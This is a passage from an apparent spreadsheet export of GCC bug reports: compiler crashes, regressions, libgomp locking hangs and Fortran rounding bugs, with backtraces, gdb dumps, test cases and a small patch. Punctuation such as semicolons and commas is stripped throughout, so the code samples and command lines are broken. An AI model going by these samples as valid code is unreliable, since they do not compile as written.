0xc7f12a analyze_scalar_evolution_in_loop
	/home/dimhen/src/gcc_current/gcc/tree-scalar-evolution.c:2161
0xc7f26f simple_iv(loop* loop* tree_node* affine_iv* bool)
	/home/dimhen/src/gcc_current/gcc/tree-scalar-evolution.c:3269
0x13dc669 dr_analyze_innermost(data_reference* loop*)
	/home/dimhen/src/gcc_current/gcc/tree-data-ref.c:829
0x13e1742 create_data_ref(loop* loop* tree_node* gimple_statement_base* bool)
	/home/dimhen/src/gcc_current/gcc/tree-data-ref.c:1100
0x13e261c find_data_references_in_stmt(loop* gimple_statement_base* vec*)
	/home/dimhen/src/gcc_current/gcc/tree-data-ref.c:4532
0x13e27ea find_data_references_in_bb(loop* basic_block_def* vec*)
	/home/dimhen/src/gcc_current/gcc/tree-data-ref.c:4585
0x13e2a10 find_data_references_in_loop(loop* vec*)
	/home/dimhen/src/gcc_current/gcc/tree-data-ref.c:4618
0x13e3b4a compute_data_dependences_for_loop(loop* bool vec* vec* vec*)
	/home/dimhen/src/gcc_current/gcc/tree-data-ref.c:4694
0xc65565 tree_predictive_commoning_loop
	/home/dimhen/src/gcc_current/gcc/tree-predcom.c:2486
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-51298</t>
  </si>
  <si>
    <t>libgomp team_barrier locking failures</t>
  </si>
  <si>
    <t>There seems to be a locking related failure in the linux barrier implementation because libgomp testcases hang on power7.  This is both before and after the fix for http://gcc.gnu.org/bugzilla/show_bug.cgi?id=51249
Here's a dump of some info from one of the hung tests that might help pin down the problem.  Then again it might not.  power7 quite aggressively speculates reads so I suspect a missing read barrier somewhere.
(gdb) bt
#0  0x00000fff91ebf36c in sys_futex0 (val=0 op= addr=0x100210d4) at /home/amodra/src/gcc-current/libgomp/config/linux/powerpc/futex.h:48
#1  futex_wait (val=0 addr=0x100210d4) at /home/amodra/src/gcc-current/libgomp/config/linux/powerpc/futex.h:61
#2  do_wait (val=0 addr=) at /home/amodra/src/gcc-current/libgomp/config/linux/wait.h:64
#3  gomp_team_barrier_wait_end (bar=0x100210d0 state=0) at /home/amodra/src/gcc-current/libgomp/config/linux/bar.c:109
#4  0x00000fff91eb7540 in GOMP_barrier () at /home/amodra/src/gcc-current/libgomp/barrier.c:40
#5  0x0000000010000f10 in .test_barrier.822._omp_fn.2 () at /home/amodra/src/gcc-current/libgomp/testsuite/libgomp.fortran/omp_parse2.f90:59
#6  0x0000000010000b90 in test_barrier () at /home/amodra/src/gcc-current/libgomp/testsuite/libgomp.fortran/omp_parse2.f90:56
#7  MAIN__ () at /home/amodra/src/gcc-current/libgomp/testsuite/libgomp.fortran/omp_parse2.f90:5
#8  main (argc= argv=) at /home/amodra/src/gcc-current/libgomp/testsuite/libgomp.fortran/omp_parse2.f90:2
#9  0x00000fff91ccf05c in .generic_start_main () from /lib64/power7/libc.so.6
#10 0x00000fff91ccf27c in .__libc_start_main () from /lib64/power7/libc.so.6
#11 0x0000000000000000 in ?? ()
(gdb) up 3
#3  gomp_team_barrier_wait_end (bar=0x100210d0 state=0) at /home/amodra/src/gcc-current/libgomp/config/linux/bar.c:109
(gdb) p *bar
$1 = {total = 4 generation = 0 awaited = 1}
(gdb) p state
$2 = 0
(gdb) p generation
$3 = 0
(gdb) p gomp_tls_data
$4 = {fn = 0 data = 0x0 ts = {team = 0x10021050 work_share = 0x10021150 last_work_share = 0x0 team_id = 0 level = 1 active_level = 1 single_count = 0 static_trip = 0} task = 0x10021568 release = {count = 0} thread_pool = 0x10021760}
(gdb) p *gomp_tls_data.ts.team
$5 = {nthreads = 4 work_share_chunk = 8 prev_ts = {team = 0x0 work_share = 0x0 last_work_share = 0x0 team_id = 0 level = 0 active_level = 0 single_count = 0 static_trip = 0} master_release = {count = 0} ordered_release = 0x10021708 work_share_list_alloc = 0x100211d0 work_share_list_free = 0x0 single_count = 0 barrier = {total = 4 generation = 0 awaited = 1} work_shares = {{sched = GFS_RUNTIME mode = 0 {{chunk_size = 0 end = 0 incr = 0} {chunk_size_ull = 0 end_ull = 0 incr_ull = 0}} ordered_team_ids = 0x0 ordered_num_used = 0 ordered_owner = 0 ordered_cur = 0 next_alloc = 0x0 lock = {flag = 0} threads_completed = 0 {next = 0 next_ull = 0 copyprivate = 0x0} {next_ws = 0x0 next_free = 0x0} inline_ordered_team_ids = 0x100211a8} {sched = GFS_RUNTIME mode = 0 {{chunk_size = 0 end = 0 incr = 0} {chunk_size_ull = 0 end_ull = 0 incr_ull = 0}} ordered_team_ids = 0x0 ordered_num_used = 0 ordered_owner = 0 ordered_cur = 0 next_alloc = 0x0 lock = {flag = 0} threads_completed = 0 {next = 0 next_ull = 0 copyprivate = 0x0} {next_ws = 0x10021250 next_free = 0x10021250} inline_ordered_team_ids = 0x10021228} {sched = GFS_RUNTIME mode = 0 {{chunk_size = 0 end = 0 incr = 0} {chunk_size_ull = 0 end_ull = 0 incr_ull = 0}} ordered_team_ids = 0x0 ordered_num_used = 0 ordered_owner = 0 ordered_cur = 0 next_alloc = 0x0 lock = {flag = 0} threads_completed = 0 {next = 0 next_ull = 0 copyprivate = 0x0} {next_ws = 0x100212d0 next_free = 0x100212d0} inline_ordered_team_ids = 0x100212a8} {sched = GFS_RUNTIME mode = 0 {{chunk_size = 0 end = 0 incr = 0} {chunk_size_ull = 0 end_ull = 0 incr_ull = 0}} ordered_team_ids = 0x0 ordered_num_used = 0 ordered_owner = 0 ordered_cur = 0 next_alloc = 0x0 lock = {flag = 0} threads_completed = 0 {next = 0 next_ull = 0 copyprivate = 0x0} {next_ws = 0x10021350 next_free = 0x10021350} inline_ordered_team_ids = 0x10021328} {sched = GFS_RUNTIME mode = 0 {{chunk_size = 0 end = 0 incr = 0} {chunk_size_ull = 0 end_ull = 0 incr_ull = 0}} ordered_team_ids = 0x0 ordered_num_used = 0 ordered_owner = 0 ordered_cur = 0 next_alloc = 0x0 lock = {flag = 0} threads_completed = 0 {next = 0 next_ull = 0 copyprivate = 0x0} {next_ws = 0x100213d0 next_free = 0x100213d0} inline_ordered_team_ids = 0x100213a8} {sched = GFS_RUNTIME mode = 0 {{chunk_size = 0 end = 0 incr = 0} {chunk_size_ull = 0 end_ull = 0 incr_ull = 0}} ordered_team_ids = 0x0 ordered_num_used = 0 ordered_owner = 0 ordered_cur = 0 next_alloc = 0x0 lock = {flag = 0} threads_completed = 0 {next = 0 next_ull = 0 copyprivate = 0x0} {next_ws = 0x10021450 next_free = 0x10021450} inline_ordered_team_ids = 0x10021428} {sched = GFS_RUNTIME mode = 0 {{chunk_size = 0 end = 0 incr = 0} {chunk_size_ull = 0 end_ull = 0 incr_ull = 0}} ordered_team_ids = 0x0 ordered_num_used = 0 ordered_owner = 0 ordered_cur = 0 next_alloc = 0x0 lock = {flag = 0} threads_completed = 0 {next = 0 next_ull = 0 copyprivate = 0x0} {next_ws = 0x100214d0 next_free = 0x100214d0} inline_ordered_team_ids = 0x100214a8} {sched = GFS_RUNTIME mode = 0 {{chunk_size = 0 end = 0 incr = 0} {chunk_size_ull = 0 end_ull = 0 incr_ull = 0}} ordered_team_ids = 0x0 ordered_num_used = 0 ordered_owner = 0 ordered_cur = 0 next_alloc = 0x0 lock = {flag = 0} threads_completed = 0 {next = 0 next_ull = 0 copyprivate = 0x0} {next_ws = 0x0 next_free = 0x0} inline_ordered_team_ids = 0x10021528}} task_lock = {flag = 0} task_queue = 0x0 task_count = 0 task_running_count = 0 implicit_task = 0x10021568}
(gdb) p *gomp_tls_data.ts.work_share
$6 = {sched = GFS_RUNTIME mode = 0 {{chunk_size = 0 end = 0 incr = 0} {chunk_size_ull = 0 end_ull = 0 incr_ull = 0}} ordered_team_ids = 0x0 ordered_num_used = 0 ordered_owner = 0 ordered_cur = 0 next_alloc = 0x0 lock = {flag = 0} threads_completed = 0 {next = 0 next_ull = 0 copyprivate = 0x0} {next_ws = 0x0 next_free = 0x0} inline_ordered_team_ids = 0x100211a8}</t>
  </si>
  <si>
    <t>GCC-83184</t>
  </si>
  <si>
    <t>Out of memory or ICE with option -fdec</t>
  </si>
  <si>
    <t>With invalid code and option -fdec-structure or -fdec :
$ cat z1.f90
program p
   structure /s/
      integer n(..) /1/
   end structure
end
$ cat z2.f90
program p
   structure /s/
      integer n(..) /2*1/
   end structure
end
$ gfortran-8-20171126 -c z1.f90 -fdec
f951: out of memory allocating 18446744073709551600 bytes after a total of 499712 bytes
---
Configured with --enable-checking=yes :
$ gfortran-8-20171126-chk -c z1.f90
z1.f90:2:12:
    structure /s/
            1
Error: STRUCTURE at (1) is a DEC extension enable with '-fdec-structure'
z1.f90:4:6:
    end structure
      1
Error: Expecting END PROGRAM statement at (1)
z1.f90:3:19:
       integer n(..) /1/
                   1
Error: Assumed-rank array at (1) must be a dummy argument
in gfc_format_decoder at fortran/error.c:934
0x6be93e gfc_format_decoder
        ../../gcc/fortran/error.c:934
0x152fe43 pp_format(pretty_printer* text_info*)
        ../../gcc/pretty-print.c:1351
0x152033b diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*)
        ../../gcc/diagnostic.c:984
0x6be7a7 gfc_error_opt
        ../../gcc/fortran/error.c:1299
0x6bfce0 gfc_error(char const* ...)
        ../../gcc/fortran/error.c:1328
0x7279f6 resolve_variable
        ../../gcc/fortran/resolve.c:5267
0x7279f6 gfc_resolve_expr(gfc_expr*)
        ../../gcc/fortran/resolve.c:6706
0x72b238 resolve_data_variables
        ../../gcc/fortran/resolve.c:15504
0x733f30 resolve_data
        ../../gcc/fortran/resolve.c:15529
0x733f30 resolve_types
        ../../gcc/fortran/resolve.c:16356
0x72f6ac gfc_resolve(gfc_namespace*)
        ../../gcc/fortran/resolve.c:16445
0x71903a resolve_all_program_units
        ../../gcc/fortran/parse.c:6031
0x71903a gfc_parse_file()
        ../../gcc/fortran/parse.c:6281
0x75e67f gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-27096</t>
  </si>
  <si>
    <t>Automatic charlen pointer array result produces and ICE</t>
  </si>
  <si>
    <t>As part of the continuing crusade to get tonto compiled:
character(10) dimension (2) :: inp
inp = abcdefghij
inp = join_1(inp)
print * inp
contains
function join_1(self) result(res)
character(len=*) dimension(:) :: self
character(len=len(self)) dimension(:) pointer :: res
allocate (res(2))
res = self
end function
end
produces
test2.f90: In function â€˜join_1â€™:
test2.f90:1: internal compiler error: in gfc_trans_deferred_array at fortran/trans-array.c:4394
If I override the ICE by returning and finishing the block I get the most peculiar code:
join_1 (__result .__result self _self)
{
int4 ..__result
int4 ubound.0
int4 stride.1
int4 offset.2
int4 size.3
char[0:D.939][1:_self] * self.0
bit_size_type D.934
 D.935
bit_size_type D.937
 D.938
int4 D.939
bit_size_type D.940
 D.941
{
int4 D.936
D.936 = self-&gt;dim[0].stride
stride.1 = D.936 == 0 ? 1 : D.936
self.0 = (char[0:D.939][1:_self] *) (char[0:][1:_self] *) self-&gt;data
ubound.0 = self-&gt;dim[0].ubound - self-&gt;dim[0].lbound + 1
size.3 = stride.1 * NON_LVALUE_EXPR 
offset.2 = -stride.1
D.937 = (bit_size_type) () _self * 8
D.938 = () _self
D.939 = size.3 - 1
D.940 = (bit_size_type) () _self * (bit_size_type) () size.3 * 8
D.941 = () _self * () size.3
}
..__result = _self
D.934 = (bit_size_type) () ..__result * 8
D.935 = () ..__result
}
Paul</t>
  </si>
  <si>
    <t>GCC-44606</t>
  </si>
  <si>
    <t>Wrong SPE floating point during computation</t>
  </si>
  <si>
    <t>I attached two testcase which is stripped down graphicsmagick code.
tc-resize2.c has a few instructions more than tc-resize.c. I belive the bug is 
the same.
 gcc -o tc2 -O0 -Wall -Wextra tc-resize.c
 gcc -o tc2 -O2 -Wall -Wextra tc-resize.c
 ( ./tc0  echo - ./tc2 )
 .19 2484.000000
 .21 2700.000000
 .23 2916.000000
 .24 3132.000000
 .26 3348.000000
 -
 .0 2484.000000
 .0 2700.000000
 .0 2916.000000
 .0 3132.000000
 .0 3348.000000
 gcc -o tc20 -O0 -Wall -Wextra tc-resize2.c
 gcc -o tc22 -O2 -Wall -Wextra tc-resize2.c
 ( ./tc20  echo - ./tc22 )
 .26 3264.000000
 .28 3520.000000
 .30 3776.000000
 .32 4032.000000
 .34 4288.000000
 -
 .14 1734.000000
 .15 1870.000000
 .16 2006.000000
 .17 2142.000000
 .18 2278.000000
 Now here is stripped down output of the assembly file:
 MinifyImage:
         evstdd 2688(11)
 .L9:
         li 260
         stw 2664(1)
 .L11:
  #APP
  # 105 tc-resize.c 1
         nop
  # 0  2
 #NO_APP
         lis 19.LC5@ha
         efdmul 5926           r26 should be 0.0078125 but is 0
                                 r26 bits 32..63 are dunno about 0..31    
         la 19.LC5@l(19)
         evldd 190(19)          r19 is 0.5
         efdadd 5519           r5 is expected to be .5
         efdctuiz 55            r5 is 0
         rlwinm 5500xff
 #APP
  # 107 tc-resize.c 1
         nop
  # 0  2
 #NO_APP
         evmergehi 699
         mr 79
         mr 87
         mr 76
         crxor 666     that should be 999 but is a different issue :)
         bl fprintf      # r5 int (bad) r6 pad r7 &amp; r8 double
r26 is zero and that is wrong. I belive 1/128.0 gets replaced by 0.0 and optimized.
Sebastian</t>
  </si>
  <si>
    <t>GCC-48187</t>
  </si>
  <si>
    <t>infinite errors with misplaced [ in @interface definition</t>
  </si>
  <si>
    <t>While parsing the code:
@interface InfiniteErrors { ]} @end
The compiler will repeatedly and indefinitely log the error:
error: expected specifier-qualifier-list before ']' token
This occurs in 4.2.1 also so I believe it is an old problem searched for an existing report but don't see anything similar.</t>
  </si>
  <si>
    <t>cjwl</t>
  </si>
  <si>
    <t>GCC-30465</t>
  </si>
  <si>
    <t>Duplicated overflow warning</t>
  </si>
  <si>
    <t>paolo:~/Work&gt; more warning.cc
int main()
{
 wchar_t wc = ((wchar_t)1 &lt;&lt; 31) - 1
}
paolo:~/Work&gt; g++ warning.cc
warning.cc: In function 'int main()':
warning.cc:3: warning: integer overflow in expression
warning.cc:3: warning: overflow in implicit constant conversion</t>
  </si>
  <si>
    <t>GCC-13618</t>
  </si>
  <si>
    <t>'internal compiler error: in c_expand_expr at c-common.c' when printing a compile error</t>
  </si>
  <si>
    <t>When compiling a small program involving a fair amount of template processing 
gcc aborts with 'internal compiler error' when trying to print out a 
programming error:
CacheTemplate.cpp: In member function `Value&amp; Cache&lt;Key Value MissHandler 
   ReplacementPolicy&gt;::get(const Key&amp;) [with Key = int Value = char 
   MissHandler = CharMaker ReplacementPolicy = TestReplacementPolicy]':
test.cpp:36:   instantiated from here
CacheTemplate.cpp:12: internal compiler error: in c_expand_expr at c-common.c:
   4341
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I will include the preprocessed source as soon as I can figure out where to 
upload it.</t>
  </si>
  <si>
    <t>youkai</t>
  </si>
  <si>
    <t>GCC-31325</t>
  </si>
  <si>
    <t>gcj support for ARM EABI</t>
  </si>
  <si>
    <t>Currently there is no gcj support on the ARM EABI platform.  I have gathered together a number of patches that allow it to build and will be attaching them to this bug.
I would like to see this moving forward and getting support into mainline there are inevitably going to be issues.</t>
  </si>
  <si>
    <t>s_j_newbury</t>
  </si>
  <si>
    <t>GCC-10717</t>
  </si>
  <si>
    <t>Performance issue in expand_static_init with large number of static initializors</t>
  </si>
  <si>
    <t>This is related to http://gcc.gnu.org/PR?10060 as the code is the same but the problem is different.
cp_finish_decl (cp/decl.c:8221) calls expand_static_init (cp/decl.c:8512) calls value_member and value_member looks though a linked list which is very ineffienct a better way is to use a hashtable.
Release:
3.4
Environment:
powerpc-darwin (all really does not matter).
How-To-Repeat:
See http://gcc.gnu.org/PR?10060 how to generate the file and compile it it will ice when compiling (but that is the problem for that PR).</t>
  </si>
  <si>
    <t>GCC-36976</t>
  </si>
  <si>
    <t>FAIL: g++.dg/torture/stackalign/unwind-2.C</t>
  </si>
  <si>
    <t>Some newly added stack alignment tests failed on Linux/ia32:
FAIL: g++.dg/torture/stackalign/unwind-2.C  -O1  execution test
FAIL: g++.dg/torture/stackalign/unwind-2.C  -O2  execution test
FAIL: g++.dg/torture/stackalign/unwind-2.C  -O3 -fomit-frame-pointer  execution test
FAIL: g++.dg/torture/stackalign/unwind-2.C  -O3 -g  execution test
The discussions are at
http://gcc.gnu.org/ml/gcc-patches/2008-07/msg02133.html
The patch is posted at
http://gcc.gnu.org/ml/gcc-patches/2008-07/msg02221.html</t>
  </si>
  <si>
    <t>GCC-56447</t>
  </si>
  <si>
    <t>[C++11] Lambda in template has conversion op it shouldn't have</t>
  </si>
  <si>
    <t>template 
void f()
{
  int i
  // This lambda should not have a conversion op since it captures i
  int (*p)() = [=]{ return i } // { dg-error cannot convert }
}</t>
  </si>
  <si>
    <t>GCC-63582</t>
  </si>
  <si>
    <t>[5 Regression]:  g++.dg/init/enum1.C ... (test for errors line 12)</t>
  </si>
  <si>
    <t>This test used to pass and now fails.
Last known previous revision it passed: r216206.
First known revision where FAIL is seen: r216224.
A commit in the revision range (216206:216224] caused this test to fail as follows:
FAIL: g++.dg/init/enum1.C  -std=gnu++98  (test for errors line 12)
FAIL: g++.dg/init/enum1.C  -std=gnu++11  (test for errors line 12)
FAIL: g++.dg/init/enum1.C  -std=gnu++1y  (test for errors line 12)
The g++.log has nothing to add there's simply no error for the enum which seems like a gcc bug rather than a required test-suite tweak.
In gcc-testresults@ I see similar errors for arm7l-unknown-linux-gnueabihf and hppa2.0w-hp-hpux11.11.  Not sure of the other systems but there's no target-specific support for __int128 for cris-elf.
Author of suspected commit in revision-range CC:ed.</t>
  </si>
  <si>
    <t>GCC-46966</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in execute_cse_reciprocals at tree-ssa-math-opts.c:474 with -floop-interchange -fno-tree-copy-prop -fno-tree-loop-im</t>
  </si>
  <si>
    <t>Created attachment 22770
reduced testcase (from graphite/interchange-0.c)
Compiler output:
$ gcc -O -floop-interchange -ffast-math -fno-tree-copy-prop -fno-tree-loop-im pr46966.c  
pr46966.c: In function 'foo':
pr46966.c:3:6: internal compiler error: in execute_cse_reciprocals at tree-ssa-math-opts.c:474
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  fancy_abort (file=0x117cbd0 /mnt/svn/gcc-trunk/gcc/tree-ssa-math-opts.c line=474 
    function=0x117cc70 execute_cse_reciprocals) at /mnt/svn/gcc-trunk/gcc/diagnostic.c:892
#1  0x00000000009b6e3e in execute_cse_reciprocals () at /mnt/svn/gcc-trunk/gcc/tree-ssa-math-opts.c:474
#2  0x00000000007ecabf in execute_one_pass (pass=0x1635d20) at /mnt/svn/gcc-trunk/gcc/passes.c:1553
#3  0x00000000007ecd85 in execute_pass_list (pass=0x1635d20) at /mnt/svn/gcc-trunk/gcc/passes.c:1608
#4  0x00000000007ecd97 in execute_pass_list (pass=0x1634d60) at /mnt/svn/gcc-trunk/gcc/passes.c:1609
#5  0x000000000092da36 in tree_rest_of_compilation (fndecl=0x7ffff5cc4f00) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:422
#6  0x0000000000af32e2 in cgraph_expand_function (node=0x7ffff5ce4000) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1508
#7  0x0000000000af58ba in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1567
#8  cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1827
#9  0x0000000000af5e3a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1031
#10 0x0000000000508e0c in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:9845
#11 0x00000000008d7206 in compile_file (argc=17 argv=0x7fffffffda88) at /mnt/svn/gcc-trunk/gcc/toplev.c:591
#12 do_compile (argc=17 argv=0x7fffffffda88) at /mnt/svn/gcc-trunk/gcc/toplev.c:1874
#13 toplev_main (argc=17 argv=0x7fffffffda88) at /mnt/svn/gcc-trunk/gcc/toplev.c:1937
#14 0x00007ffff6586bbd in __libc_start_main () from /lib/libc.so.6
#15 0x00000000004ef7f5 in _start ()
Tested revisions:
r167809 - crash
r167723 - crash
r165699 - OK
4.5 r166509 - OK</t>
  </si>
  <si>
    <t>GCC-12491</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] Destructor fails to compile when optimizations (inlining) are enabled</t>
  </si>
  <si>
    <t>Problem description
===================
  The compiler failes to compile the destructor of the Error class (see below)
when its body is outside of the class definition and inlining is turned on.
Moving the body within the Error class definition makes the error disappear. 
  Turning of inlining using the -fno-inline switch solves the problem. The
problem is also solved by disabling optimizations by using either -O0 or
omitting the -O2.
  Best regards
  Costas
P.S. Keep up the great work.
System description
==================
  The g++ used is the 3.3.1 configured with the following command on a Intel
Solaris 2.8 system:
./configure --prefix= --enable-threads --enable-languages=cc++java
--disable-nls
Thread model: posix
How to reproduce the error
==========================
  The example can be successfully compiled with:
g++  -c -O2 -fno-inline
  But fails when the following is used:
g++  -c -O2
Example file producing error (after dashed line)
================================================
---------------------------------------------------------------
class Object
{
public:
	virtual ~Object (void)
		{ return }
}
class AutoPtr
{
public:
	~AutoPtr (void)
		{ delete m_rep return }
private:
        const Object*   m_rep
}
class Handle
{
public:
	~Handle	(void)
		{ return }
private:
	AutoPtr		m_rep
}
class HandleOf : public Handle
{
public:
	~HandleOf (void)
		{ return }
}
class Error
{
public:
	~Error (void)
private:
	HandleOf	m_hndl
}
Error::~Error (void)
{
	return
}
---------------------------------------------------------------</t>
  </si>
  <si>
    <t>harizak</t>
  </si>
  <si>
    <t>GCC-53221</t>
  </si>
  <si>
    <t>[C++11] basic_string lacks copy/move constructors with allocator</t>
  </si>
  <si>
    <t>The library implementation of gcc 4.8.0 20120429 (experimental) misses the following copy/move constructors with allocators:
basic_string(const basic_string
basic_string(basic_string
These were added to the working draft with acceptance of the allocator proposal
http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2554.pdf 
The following test case fails:
//---
#include 
#include 
int main()
{
  std::string s1
  std::string s2(s1 std::allocator())
  std::string s3(static_cast&lt;std::string
}
//---</t>
  </si>
  <si>
    <t>GCC-68799</t>
  </si>
  <si>
    <t>lto ICE on powerpc64le-linux-gnu builing python 2.7.x</t>
  </si>
  <si>
    <t>seen with the current 5.3 branch binutils from the 2.26 branch powerpc64le-linux-gnu only big endian powerpc targets seem to succeed.
powerpc64le-linux-gnu-gcc -pthread -Wl-zrelro  -fno-strict-aliasing -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototype
s -D_FORTIFY_SOURCE=2 -g -fstack-protector-strong -Wformat -Werror=format-security  -fprofile-use -fprofile-correction
 -g -flto -fuse-linker-plugin -ffat-lto-objects -Xlinker -export-dynamic -Wl-O1 -Wl-Bsymbolic-functions -o python \
                Modules/python.o \
                -Wl--whole-archive libpython2.7.a -Wl--no-whole-archive -lpthread -ldl  -lutil -L/usr/lib -lz       
    -lm  
../Python/peephole.c: In function 'PyCode_Optimize':
../Python/peephole.c:299:1: internal compiler error: Segmentation fault
 PyCode_Optimize(PyObject *code PyObject* consts PyObject *names
 ^
0x1026a64b crash_signal
        ../../src/gcc/toplev.c:383
0x10e1f1f8 phi_add_costs
        ../../src/gcc/gimple-ssa-strength-reduction.c:2397
0x10e1de17 replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2440
0x10e1dd3b replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2464
0x10e1dd3b replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2464
0x10e1dd3b replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2464
0x10e1dd3b replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2464
0x10e1dd3b replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2464
0x10e1dd3b replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2464
0x10e1dd3b replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2464
0x10e1dd3b replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2464
0x10e1dd3b replace_uncond_cands_and_profitable_phis
        ../../src/gcc/gimple-ssa-strength-reduction.c:2464
0x10bb46cf analyze_candidates_and_replace
        ../../src/gcc/gimple-ssa-strength-reduction.c:3570
0x10bb46cf execute
        ../../src/gcc/gimple-ssa-strength-reduction.c:3681
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: powerpc64le-linux-gnu-gcc returned 1 exit status
compilation terminated.
/usr/bin/ld: error: lto-wrapper failed
collect2: error: ld returned 1 exit status
Makefile:496: recipe for target 'python' failed
object files at https://people.debian.org/~doko/tmp/lto-tst.tar.xz</t>
  </si>
  <si>
    <t>GCC-59038</t>
  </si>
  <si>
    <t>[4.9 Regression] r204398 causes 186.crafty init.c to be miscompiled</t>
  </si>
  <si>
    <t>-fno-tree-loop-distribute-patterns fixes it.  Trying to reduce.</t>
  </si>
  <si>
    <t>GCC-59836</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] Wrong outputs with rounding formats for some values.</t>
  </si>
  <si>
    <t>This is a split off pr59774 comment 9. The code
 print (rug45.3) 891.1
 print (rdg45.3) -891.1
end
compiled with trunk (r206559) gives the output
                                       9.    
                                      -9.    
I have also found that the code
print '(RUF2.0)' 0.6
print '(RDF3.0)' -0.6
end
gives
7.
-7.
Both problems occur because the Fw.d format is not properly handled when d==0. The following patch fixes both problems
--- ../_clean/libgfortran/io/write_float.def	2014-01-04 15:51:53.000000000 +0100
+++ libgfortran/io/write_float.def	2014-01-15 22:22:17.000000000 +0100
@@ -3737 +3737 @@ output_float (st_parameter_dt *dtp cons
   updown:
   rchar = '0'
-  if (w &gt; 0 &amp;&amp; d == 0 &amp;&amp; p == 0)
+  if (ft != FMT_F &amp;&amp; nbefore == 0 &amp;&amp; w &gt; 0 &amp;&amp; d == 0 &amp;&amp; p == 0)
     nbefore = 1
   /* Scan for trailing zeros to see if we really need to round it.  */
   for(i = nbefore + nafter i &lt; ndigits i++)
@@ -38613 +38614 @@ output_float (st_parameter_dt *dtp cons
   do_rnd:
   if (nbefore + nafter == 0)
+    /* Handle the case Fw.0 and value &lt; 1.0 */
     {
       ndigits = 0
       if (nzero_real == d &amp;&amp; digits[0] &gt;= rchar)
 	{
 	  /* We rounded to zero but shouldn't have */
-	  nzero--
-	  nafter = 1
+	  nbefore = 1
+          digits--
 	  digits[0] = '1'
 	  ndigits = 1
 	}
The first patch handles the first problem by restricting the test to the E* formats and the second one fixes the way Fw.0 handles values &lt; 1.0 (yes I have seen the formatting issue for the line digits--. I'll fix it when I'll submit the patch).
AFAICT the line nzero-- does not seem necessary but I don't know why.
With the patch the first test gives
                                     892.    
                                    -892.    
and the second
1.
-1.
and I did not see any regression when retesting with it.</t>
  </si>
  <si>
    <t>GCC-11471</t>
  </si>
  <si>
    <t>ICE on illegal use of typedef'd member class</t>
  </si>
  <si>
    <t>[roberto@zoltan tmp]$ g++ -v
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Configured with: ./configure --prefix=/usr/local
Thread model: posix
gcc version 3.3
[roberto@zoltan tmp]$ g++ mc91.ii
In file included from AskTell.defs.hh:205
                 from mc91.cc:2:
AskTell.inlines.hh:130: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[roberto@zoltan tmp]$ /spare/bin/g++ -v
Reading specs from /spare/lib/gcc-lib/i686-pc-linux-gnu/3.4/specs
Configured with: ../gcc/configure --prefix=/spare
Thread model: posix
gcc version 3.4 20030630 (experimental)
[roberto@zoltan tmp]$ /spare/bin/g++ mc91.ii
In file included from AskTell.defs.hh:29
                 from mc91.cc:2:
/usr/local/include/c++/3.3/limits:897: error: `float __builtin_huge_valf()'
   cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:897: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:897: error: `float __builtin_huge_valf()'
   cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:897: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:899: error: `float __builtin_nanf(const
   char*)' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:899: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:899: error: `float __builtin_nanf(const
   char*)' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:899: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:900: error: `
   std::numeric_limits::has_quiet_NaN' cannot appear in a
   constant-expression
/usr/local/include/c++/3.3/limits:915: error: `
   std::numeric_limits::has_infinity' cannot appear in a
   constant-expression
/usr/local/include/c++/3.3/limits:915: error: `
   std::numeric_limits::has_quiet_NaN' cannot appear in a
   constant-expression
/usr/local/include/c++/3.3/limits:955: error: `double __builtin_huge_val()'
   cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:955: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:955: error: `double __builtin_huge_val()'
   cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:955: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:957: error: `double __builtin_nan(const
   char*)' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:957: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:957: error: `double __builtin_nan(const
